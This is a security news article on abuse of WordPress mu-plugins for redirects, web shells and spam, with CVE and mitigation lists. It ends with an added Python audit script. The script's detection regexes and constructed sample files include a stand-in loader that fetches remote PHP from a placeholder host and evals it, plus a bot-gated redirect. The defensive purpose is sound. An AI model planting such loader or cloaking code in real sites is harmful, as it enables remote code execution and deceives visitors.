Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site Images

Cybersecurity researchers have identified a new tactic employed by threat actors targeting WordPress websites. By abusing the mu-plugins directory, attackers plant malicious PHP code that gives them persistent remote access and redirects site visitors to fraudulent destinations. The directory itself is not the vulnerability: attackers write to it after gaining a foothold by other means, and choose it because anything placed there runs on every request.

Understanding mu-Plugins

In WordPress, mu-plugins stands for must-use plugins. These are PHP files placed in the wp-content/mu-plugins directory (the path held by the WPMU_PLUGIN_DIR constant) and loaded automatically on every request, before regular plugins and the theme, without being activated through the admin dashboard. Only PHP files at the top level of the directory are loaded; anything in a subdirectory runs only if a top-level file includes it. Must-use plugins do appear under a separate Must-Use tab on the Plugins screen, but they cannot be deactivated or deleted from there and never receive update notifications, so a file dropped into this directory keeps running until someone removes it from the file system. That combination of automatic execution and low visibility is what makes the directory attractive for persistence.

The Threat Landscape

Security firm Sucuri has reported multiple instances where attackers have utilized the mu-plugins directory to deploy various types of malicious PHP code:

1. Redirection Scripts: A file such as redirect.php reroutes visitors to attacker-controlled websites. The destination pages typically pose as a legitimate browser update, tricking users into downloading malware capable of stealing data or compromising the system further.

2. Web Shells: A file such as index.php acts as a web shell loader. Rather than carrying its payload inline, it fetches a remote PHP script (hosted on platforms like GitHub in the observed cases) and executes it, giving the attacker arbitrary code execution and extensive control over the compromised site while keeping the on-disk file small and easy to swap out.

3. Spam Injection: A file such as custom-js-loader.php injects unwanted content into the rendered site, for example replacing site images with explicit material or rewriting outbound links so that they point to malicious sites. Besides exposing visitors, this damages the site’s reputation and search rankings.

Evasion Techniques

To avoid detection, these scripts commonly inspect the request, typically the User-Agent header, to decide whether the visitor is a bot such as a search engine crawler. Bots are served the unmodified page while human visitors receive the redirect or injected content. As a result the malicious behavior never shows up in search engine indexes, blacklist checks, or remote security scans, all of which see a clean site. This is why a server-side review of the files themselves, rather than an external scan alone, is needed to find these infections.

Broader Implications

The exploitation of WordPress sites extends beyond the mu-plugins directory. Attackers have been observed using compromised sites to:

– Distribute Malware: Infected sites can present visitors with a fake CAPTCHA verification that instructs them to paste and run a PowerShell command (the so-called ClickFix technique), leading to the installation of malware such as Lumma Stealer.

– Inject Malicious JavaScript: Embedded JavaScript can redirect visitors to unwanted third-party domains or act as a skimmer that captures payment card details and other sensitive financial data entered during checkout.

Potential Entry Points

The exact methods used to breach these WordPress sites remain under investigation. However, the usual entry points for this kind of compromise are:

– Outdated Plugins or Themes: Unpatched or abandoned plugins and themes carry known flaws that attackers exploit, often with automated scanners within days of a vulnerability being disclosed.

– Compromised Admin Credentials: Weak, reused, or phished passwords grant direct access to the site’s backend, from which an attacker can upload files or install a malicious plugin.

– Server Misconfigurations: Improper server settings, such as overly permissive file permissions or exposed backup and installer files, create gaps that attackers use to gain a foothold.

Recent Exploited Vulnerabilities

According to a report from Patchstack, several critical vulnerabilities have been actively exploited since the beginning of the year:

1. CVE-2024-27956: An unauthenticated arbitrary SQL execution vulnerability in the WordPress Automatic Plugin, carrying a CVSS score of 9.9.

2. CVE-2024-25600: An unauthenticated remote code execution vulnerability in the Bricks theme, with a CVSS score of 10.0.

3. CVE-2024-8353: An unauthenticated PHP object injection leading to remote code execution in the GiveWP plugin, also rated at 10.0 on the CVSS scale.

4. CVE-2024-4345: An unauthenticated arbitrary file upload vulnerability in the Startklar Elementor Addons for WordPress, with a CVSS score of 10.0.

Mitigation Strategies

To protect WordPress sites from such threats, administrators should implement the following measures:

– Regular Updates: Keep the WordPress core, plugins, and themes on their latest versions so that known vulnerabilities, including those listed above, are patched.

– Strong Authentication: Use long, unique passwords for all administrative accounts and enable two-factor authentication for them.

– Routine Security Audits: Regularly scan the website’s file system and database for unauthorized files or injected code, and remove what you find. Because the scripts hide from crawlers, run these checks on the server itself rather than relying only on external scanners.

– Monitor mu-Plugins Directory: Because files in wp-content/mu-plugins execute automatically and never receive update prompts, treat any file there that you did not deliberately place as suspect. Keep a baseline list of expected files with their hashes, review the directory regularly against it, and investigate new files, changed hashes, or recent modification times.

– Limit Plugin Use: Install only plugins from reputable sources, and remove any that are no longer maintained or needed, since every installed plugin adds attack surface.
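The following Python script is an added example, not code from the original article or from Sucuri, of the server-side check described under Routine Security Audits and Monitor mu-Plugins Directory. It walks a mu-plugins directory, compares every file against a baseline of expected SHA-256 hashes, and searches each file for textual indicators of the behaviors described above: fetching remote code, eval or base64 decoding, User-Agent bot filtering, redirects, and link or image rewriting. The indicator regexes, the severity scheme, the sample files, and the example.invalid host are all my own assumptions; the sample files are constructed stand-ins that merely contain the indicator strings and do nothing harmful.

```python
"""Audit wp-content/mu-plugins against a hash baseline and behavioural indicators."""
import hashlib
import re
import tempfile
from pathlib import Path

# Indicator regexes keyed by the behaviour they point at. These are assumptions
# derived from the file behaviours described in the article, not Sucuri's
# published signatures; expect false positives and tune them for your site.
INDICATORS = {
    # fetching PHP from a remote host, as the index.php loader does
    "remote_fetch": re.compile(
        r"\b(?:file_get_contents|curl_init|fopen|wp_remote_get)\s*\(\s*['\"]https?://", re.I),
    # executing decoded or downloaded code
    "dynamic_eval": re.compile(
        r"\b(?:eval|assert|create_function)\s*\(|\bbase64_decode\s*\("),
    # choosing behaviour on the User-Agent so crawlers see a clean page
    "bot_filter": re.compile(
        r"HTTP_USER_AGENT.{0,200}?(?:googlebot|bingbot|crawler|spider|yandex)", re.I | re.S),
    # sending the visitor elsewhere
    "redirect": re.compile(r"\bwp_redirect\s*\(|\bheader\s*\(\s*['\"]Location:", re.I),
    # rewriting links or images in the rendered page
    "link_rewrite": re.compile(
        r"\bpreg_replace(?:_callback)?\s*\(.{0,160}?<(?:a|img)\b", re.I | re.S),
}


def severity(hits):
    """Rank a list of indicator names. A User-Agent gate combined with a redirect
    or content rewrite is the evasion pattern from the article, so it outranks
    either indicator on its own."""
    if "bot_filter" in hits and ("redirect" in hits or "link_rewrite" in hits):
        return "critical"
    if "remote_fetch" in hits or "dynamic_eval" in hits:
        return "high"
    if hits:
        return "medium"
    return "none"


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def audit_mu_plugins(mu_dir, baseline):
    """Return one finding dict per file under mu_dir.

    baseline maps a path relative to mu_dir to the SHA-256 recorded when that
    file was deliberately placed. Files absent from the baseline are 'unexpected',
    files whose hash changed are 'modified'. WordPress autoloads only top-level
    .php files, so deeper files are marked as not autoloaded (they still matter
    if a top-level file includes them)."""
    mu_dir = Path(mu_dir)
    findings = []
    for path in sorted(p for p in mu_dir.rglob("*") if p.is_file()):
        rel = path.relative_to(mu_dir).as_posix()
        digest = sha256_of(path)
        text = path.read_text(errors="replace")
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
        if rel not in baseline:
            status = "unexpected"
        elif baseline[rel] != digest:
            status = "modified"
        else:
            status = "known"
        findings.append({
            "file": rel,
            "autoloaded": path.parent == mu_dir and path.suffix == ".php",
            "status": status,
            "indicators": hits,
            "severity": severity(hits),
            "sha256": digest,
        })
    return findings


def build_sample_dir():
    """Create a throwaway mu-plugins tree of constructed files. None is real
    malware; each only contains the textual indicators the scanner looks for,
    and example.invalid is a placeholder host that cannot resolve."""
    root = Path(tempfile.mkdtemp(prefix="mu-plugins-"))
    # A helper the administrator placed on purpose.
    (root / "site-tweaks.php").write_text(
        "<?php\nadd_filter('wp_headers', function ($h) {"
        " $h['X-Frame-Options'] = 'SAMEORIGIN'; return $h; });\n")
    # Stand-in for a bot-gated redirect: humans are redirected, crawlers are not.
    (root / "redirect.php").write_text(
        "<?php\n$ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');\n"
        "if (!preg_match('/googlebot|bingbot|spider/', $ua)) {\n"
        "    wp_redirect('https://example.invalid/update'); exit;\n}\n")
    # Stand-in for a loader that pulls remote PHP and evaluates it.
    (root / "index.php").write_text(
        "<?php\n$code = file_get_contents('https://example.invalid/payload.txt');\n"
        "eval($code);\n")
    return root


def main():
    root = build_sample_dir()
    # In practice the baseline is recorded at deploy time (e.g. with sha256sum);
    # here the one legitimate file's hash stands in for that record.
    baseline = {"site-tweaks.php": sha256_of(root / "site-tweaks.php")}
    for f in audit_mu_plugins(root, baseline):
        print(f"{f['severity']:8} {f['status']:10} {f['file']:18} "
              f"{','.join(f['indicators']) or '-'}")


if __name__ == "__main__":
    main()
```

Run it as-is to see the three constructed files ranked; on a real site, point audit_mu_plugins at wp-content/mu-plugins and a baseline you generated when the directory last had known-good contents. Treat the regexes as a triage aid: a critical or high finding is a reason to read the file, and a clean result is not proof of absence, since obfuscation can hide every one of these strings.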

Conclusion

The exploitation of the mu-plugins directory underscores the evolving tactics of cybercriminals targeting WordPress sites. By understanding these methods and implementing robust security practices, site administrators can significantly reduce the risk of compromise and protect their users from malicious activities.